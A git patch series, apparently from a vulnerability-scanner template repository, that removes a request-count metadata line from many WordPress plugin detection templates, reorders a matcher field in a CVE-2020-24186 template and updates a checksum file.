b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 743cbaa24625f0fa6a37e60627764a31ec16dfee Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jul 2023 10:15:45 +0530 Subject: [PATCH 439/609] Update CVE-2020-24186.yaml --- http/cves/2020/CVE-2020-24186.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 07121cc74d..607e7c0494 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -78,15 +78,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - 'success":true' - 'fullname' - 'shortname' - 'url' condition: and - part: body - type: status status: - 200 -# Enhanced by mp on 2022/04/19 \ No newline at end of file From dc5448fd00dfec10e18de9aec72475284bc5626f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 04:53:32 +0000 Subject: [PATCH 441/609] Auto Generated Templates Checksum [Fri Jul 7 04:53:32 UTC 2023] :robot: --- templates-checksum.txt | 442 ++++++++++++++++++++--------------------- 1 file changed, 221 insertions(+), 221 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7dd5092fd7..d619f0f401 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -200,7 +200,7 @@ helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7d helpers/wordpress/plugins/advanced-custom-fields.txt:ffc1feb775249e46c0a2c4c8c83174ca4d2a125e helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:3a20090f6629e82dc86182a58926523409ffdf49 -helpers/wordpress/plugins/all-in-one-seo-pack.txt:a35a10fae0f653f425d1e5ae6ebf257254ab4b92 +helpers/wordpress/plugins/all-in-one-seo-pack.txt:6328e55f0b8c991dca9b1bed7c3b0763f63cd1bf helpers/wordpress/plugins/all-in-one-wp-migration.txt:9c43220fa09b15d375ba7679041d0bd2e22746b8 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:9fe4681fdf4528a009bfe5a862fb05457cc811cb helpers/wordpress/plugins/amp.txt:51ddbf27bf181d542a23643649c61739795a6771 @@ -213,7 +213,7 @@ helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930cc helpers/wordpress/plugins/better-wp-security.txt:c9d80c377a036d155be198abbb91a3fb1d887536 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/breadcrumb-navxt.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b -helpers/wordpress/plugins/breeze.txt:a786e7e6a12cb225b5069f80d45bde42746d5be4 +helpers/wordpress/plugins/breeze.txt:30a642fc106c0182c093266c29f99eab897f5f74 helpers/wordpress/plugins/broken-link-checker.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f @@ -249,7 +249,7 @@ helpers/wordpress/plugins/elementor.txt:aa47e8401f52058e8878f672b20bb4bbd6d570b6 helpers/wordpress/plugins/elementskit-lite.txt:35fd2c7ac7c4486ea481738632d2b2188a5e0917 helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 -helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:e3b1c874b07e920f5092b34238b539c29b1e3578 +helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:17358dc21f97cd982510de77bcdadcaf77ef5371 helpers/wordpress/plugins/ewww-image-optimizer.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c helpers/wordpress/plugins/facebook-for-woocommerce.txt:fb0eab6a4e5058f591302926ca9d98a794f45601 helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 @@ -259,7 +259,7 @@ helpers/wordpress/plugins/fluentform.txt:a832235a17d232a9abf36075ae469dee7e69ff3 helpers/wordpress/plugins/font-awesome.txt:f4bf33bfd9c3793655f2a19fca0ee1ca41e62e6e helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 helpers/wordpress/plugins/formidable.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 -helpers/wordpress/plugins/forminator.txt:c4ed757432dfd8e67f0e06262c3d56b1657b5f07 +helpers/wordpress/plugins/forminator.txt:5a13f9241243c2d9d28367028c116b0cf92f566d helpers/wordpress/plugins/ga-google-analytics.txt:361f82e0e4329314b5ec0ac3b14d43cb15fc0c02 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:b51e37a1939bf22a226cba6aa16aa556b5bdfdf3 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:6b474cdaf13fc941946668ffea3b8a5047fc2c73 @@ -306,7 +306,7 @@ helpers/wordpress/plugins/ml-slider.txt:01e970f7ce073f9d8e4dadeae00cd5e8a06efc91 helpers/wordpress/plugins/newsletter.txt:abdb334b7c43837f64108a70a2a66817e130b80c helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/nextgen-gallery.txt:f2cc8874a54d8d40b341d84839c1b2984efc0aba -helpers/wordpress/plugins/ninja-forms.txt:34235559827d9662bd469f1ccf753f797dce542b +helpers/wordpress/plugins/ninja-forms.txt:89f6a7ed064af545594e7472a6d42aef9ece77c5 helpers/wordpress/plugins/ocean-extra.txt:5f6af51e77b84cd6616d4eaa100a736096568d86 helpers/wordpress/plugins/official-facebook-pixel.txt:c7a799ba251102d32c4623f4036bddb752445f20 